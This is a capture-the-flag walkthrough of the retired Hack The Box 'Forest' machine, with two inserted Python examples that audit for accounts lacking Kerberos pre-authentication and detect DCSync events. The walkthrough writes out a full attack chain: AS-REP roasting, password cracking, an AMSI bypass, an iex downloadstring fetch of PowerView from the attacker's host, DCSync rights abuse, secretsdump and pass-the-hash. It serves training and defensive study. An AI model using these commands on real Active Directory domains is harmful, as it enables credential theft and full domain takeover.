Forest: A walkthrough in hacking Active Directory
This box is on the retired list in Hack The Box. Here is a walkthrough of how I got full SYSTEM privileges in this Active Directory environment.
Prerequisite installations needed in Kali:
windapsearch.py — https://github.com/ropnop/windapsearch
Impacket — https://github.com/SecureAuthCorp/impacket
Evil-WinRM — https://github.com/Hackplayers/evil-winrm
Bloodhound.py — https://github.com/fox-it/BloodHound.py
Installation walkthrough of prerequisites:
Impacket
sudo apt install python3-pip
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/
sudo python3 setup.py install
Evil-WinRM
sudo gem install evil-winrm
Bloodhound.py
Install BloodHound first. I have a walkthrough on how to do that here:
Bloodhound.py is what we will be using so we don't have to get creative and drop SharpHound on a Windows box and evade Windows Defender Antivirus.
cd /opt
sudo git clone https://github.com/fox-it/BloodHound.py
cd BloodHound.py/
sudo pip3 install .
windapsearch.py
cd /opt
sudo git clone https://github.com/ropnop/windapsearch
sudo apt-get install python3-ldap
At this point we should be ready to enumerate our environment.
NMAP Scanning
nmap -A -T4 -p- 10.10.10.161
Port 389 being open with the service identified as Active Directory LDAP is a dead giveaway that we are dealing with an Active Directory environment. Since 445 is open we can also determine that it is running Windows Server 2016.
Since we have no user account credentials we need to keep enumerating the environment, so I am going to use windapsearch to see if I can bind anonymously to the domain and enumerate Active Directory account names.
Luckily for us the anonymous bind was successful and enumerated 28 accounts. (Anonymous binds are typically not allowed in AD environments, but this is the initial entry point to this box.)
Next we will do a custom objectClass wildcard query. Wildcard queries are useful for listing all OUs, groups, users, service accounts, etc. Service accounts are the important ones, as they may reveal applications running in the environment for further security research.
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
After analyzing the 312 results we see a service account in use called "svc-alfresco".
After some Google searching I find documentation on the Alfresco software and start researching how Kerberos is configured for the service.
In the documentation we see that the Alfresco software does not require Kerberos pre-authentication.
Impacket has a tool called GetNPUsers.py that can be used to request TGTs (the AS-REP hash) for accounts set up this way, for offline cracking. See the description below for this Impacket example:
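From the defender's side, "does not require Kerberos pre-authentication" is a single bit (DONT_REQ_PREAUTH, 0x400000) in the account's userAccountControl attribute, and it is worth auditing every account for it. The following is an added example, not code from the original walkthrough or from windapsearch: it parses a small, constructed "attribute: value" dump in the style windapsearch prints, decodes the userAccountControl bits, and lists the enabled accounts that have the flag set so they can be reviewed or fixed. The sample records, including the value shown for svc-alfresco, are made up for this example.

```python
# Added example (not part of the original walkthrough): audit an LDAP account
# dump for users that do not require Kerberos pre-authentication. The
# DONT_REQ_PREAUTH bit (0x400000) of userAccountControl is what makes an
# account AS-REP roastable, so a defender wants this list empty or justified.
# The dump below is constructed for this example in the "attribute: value"
# style that windapsearch prints; it is not real output from the Forest box.

# Selected userAccountControl bits, values as documented by Microsoft
# (ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Constructed sample dump: three objects separated by blank lines.
SAMPLE_DUMP = """\
cn: svc-alfresco
sAMAccountName: svc-alfresco
userAccountControl: 4260352

cn: Jane Smith
sAMAccountName: jsmith
userAccountControl: 512

cn: old-svc
sAMAccountName: old-svc
userAccountControl: 4260354
"""


def parse_ldap_dump(text):
    """Split a blank-line separated 'attribute: value' dump into one dict per object."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        attr, _, value = line.partition(":")
        current[attr.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl integer."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def find_no_preauth_accounts(records):
    """Return sAMAccountNames of enabled accounts with DONT_REQ_PREAUTH set.

    Disabled accounts are left out: the KDC rejects them before issuing any
    ticket, so they cannot be roasted until someone re-enables them.
    """
    hits = []
    for rec in records:
        try:
            uac = int(rec.get("userAccountControl", "0"))
        except ValueError:
            continue  # malformed value; skip rather than abort the audit
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(rec["sAMAccountName"])
    return hits


if __name__ == "__main__":
    for name in find_no_preauth_accounts(parse_ldap_dump(SAMPLE_DUMP)):
        print(f"{name}: pre-authentication not required ({', '.join(decode_uac(4260352))})")
```

Run against a real export, the output is the list of accounts where the flag should either be cleared or backed by a long, random password, since the AS-REP for such an account can be requested by anyone who can reach the KDC.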
Command:
python3 ./GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
As you can see from the screenshot above, we have successfully dumped the hash for the service account without needing to authenticate to the domain with a username and password. Next we will attempt to crack the password offline.
Take the TGT hash and save it to a file called hash (I used mousepad).
If you haven't done so already, note that in a Kali installation the rockyou wordlist is zipped in the following location:
/usr/share/wordlists/
You can unzip it using the command below:
Next run john from wherever you saved the hash file of the TGT for offline cracking:
Command to use:
sudo john hash --fork=4 -w=/usr/share/wordlists/rockyou.txt
The password for this service account has been successfully cracked. The password is s3rvice.
Next we will prepare to research access-based enumeration with bloodhound.py (referenced in my prerequisite installs). I recently found this project and I must say it is very simple to use with any obtained credentials.
Command to execute:
python3 bloodhound.py -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161
You will notice some JSON files get created in your BloodHound folder.
Next launch the neo4j console as shown below:
Launch BloodHound:
Log in to BloodHound with neo4j and the password that was generated when you installed BloodHound back in my prerequisites section.
Once you are in BloodHound, take all the JSON files and just drag and drop them into BloodHound. Once done you should see a message similar to the one below.
Next let's query the service account. The first place we will want to check is Reachable High Value Targets, as shown below.
After checking reachable high value targets we discover our service account is a member of the Account Operators group, which has GenericAll permissions on the Exchange Windows Permissions group.
The Exchange Windows Permissions group has WriteDacl on the domain. This means we can create a user, give it Exchange Windows Permissions membership, and grant it DCSync ACL privileges with PowerView.
Before we launch Evil-WinRM we will need to grab the PowerView GitHub repo found here:
The reason we need to do this is to apply DCSync permissions. Kali has PowerView installed, but for some reason I was having issues applying DCSync permissions when I pushed that PowerShell script over through Evil-WinRM.
So I ended up cloning PowerSploit from GitHub.
Navigate to the Recon directory and copy the PowerView.ps1 file to your Downloads directory.
Spin up an HTTP server with Python on port 80 from the Downloads directory as shown below:
This will allow us to serve the PowerView PowerShell script when we are ready to do so.
Next launch Evil-WinRM with the service account credentials we have obtained.
Command:
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Now that we have a connection established to the domain controller over WinRM, we need to create a new user and give it both Exchange Windows Permissions and Remote Management Users membership.
Commands:
net user john P@ssw0rd /add /domain
net group "Exchange Windows Permissions" john /add
net localgroup "Remote Management Users" john /add
Next we will need to bypass AMSI in Evil-WinRM. The command to do so is Bypass-4MSI, as shown in the menu option below.
At this point we should be able to get our PowerView PS1 file imported.
This is an excellent cheatsheet reference for PowerView and other tools from Will:
Command:
iex(new-object net.webclient).downloadstring('http://10.10.14.17/PowerView.ps1')
We can also flip over to our simple HTTP server and verify that the download was successful over port 80.
At this point we need to define our password and credential variables so we can add DCSync rights to our new Active Directory user.
Command:
$pass = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\john', $pass)
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
Next we will use secretsdump from Impacket to start dumping hashes from the domain controller. If you want to read more about what the secretsdump command does, you can read the description at the following location:
Command to execute:
sudo secretsdump.py htb.local/john:P@ssw0rd@10.10.10.161
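What secretsdump does here is a DCSync: it asks the domain controller for directory replication changes, and on the DC that request is recorded as Security event 4662 with the replication control-access GUIDs in the Properties field. Only domain controllers and a handful of known sync services should ever exercise those rights, which makes this step the easiest one in the chain to detect. The following is an added example, not code from the original walkthrough or from Impacket: a small detector run over constructed, flattened JSON renderings of 4662 events (the events, the account names and the placeholder GUID in the third event are made up; the three replication-right GUIDs are Microsoft's documented values). The allowlist name svc-aadc is an assumption standing in for a sync service account.

```python
# Added example (not part of the original walkthrough): flag DCSync-style
# replication requests in Windows Security event 4662 records. A DCSync run
# such as secretsdump.py asks a DC for directory changes, which the DC logs as
# 4662 with the replication control-access GUIDs in the Properties field.
# Only domain controllers (and known sync services such as Azure AD Connect)
# should do this. The events below are constructed, flattened JSON renderings
# of 4662 fields, not real logs from this box.
import json
import re

# rightsGuid values of the three replication control access rights,
# as documented by Microsoft in the AD schema.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed sample events (one JSON document per line).
SAMPLE_EVENTS = [
    # DC-to-DC replication: the DC computer account is expected to do this.
    '{"EventID": 4662, "SubjectUserName": "FOREST$", "SubjectDomainName": "HTB", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    # A plain user account asking for replication changes: what a DCSync looks like.
    '{"EventID": 4662, "SubjectUserName": "john", "SubjectDomainName": "HTB", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    # Same user touching an unrelated property (placeholder GUID): not replication.
    '{"EventID": 4662, "SubjectUserName": "john", "SubjectDomainName": "HTB", "Properties": "{11111111-2222-3333-4444-555555555555}"}',
    # A known sync service account that the analyst is expected to allowlist.
    '{"EventID": 4662, "SubjectUserName": "svc-aadc", "SubjectDomainName": "HTB", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    # Unrelated event ID.
    '{"EventID": 4624, "SubjectUserName": "john", "SubjectDomainName": "HTB"}',
]


def replication_rights_used(properties):
    """Names of replication rights whose GUIDs appear in a 4662 Properties field."""
    return sorted(
        REPLICATION_RIGHTS[g.lower()]
        for g in GUID_RE.findall(properties)
        if g.lower() in REPLICATION_RIGHTS
    )


def is_dcsync_like(event, allowlist=frozenset()):
    """True if a non-machine, non-allowlisted principal exercised a replication right."""
    if event.get("EventID") != 4662:
        return False
    if not replication_rights_used(event.get("Properties", "")):
        return False
    subject = event.get("SubjectUserName", "")
    if subject.endswith("$"):
        return False  # machine accounts; DCs replicate with each other legitimately
    return subject.lower() not in {a.lower() for a in allowlist}


def detect_dcsync(lines, allowlist=frozenset()):
    """Return (domain\\user, [rights]) for every suspicious replication event."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        if is_dcsync_like(event, allowlist):
            who = f"{event.get('SubjectDomainName', '')}\\{event['SubjectUserName']}"
            alerts.append((who, replication_rights_used(event["Properties"])))
    return alerts


if __name__ == "__main__":
    for who, rights in detect_dcsync(SAMPLE_EVENTS, allowlist={"svc-aadc"}):
        print(f"ALERT: {who} requested {', '.join(rights)}")
```

The trailing-dollar test is a deliberate simplification: it ignores every machine account, not just domain controllers, so a production rule should compare the subject against the actual list of DC computer accounts instead. The 4670 and 5136 events generated when the DACL on the domain object is changed (the Add-ObjectACL step above) are the other place to look, since that change precedes the first replication request.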
Finally we can use psexec.py to pass the hash and get a shell as SYSTEM using the local Administrator account. No cracking is necessary.
Command:
sudo psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6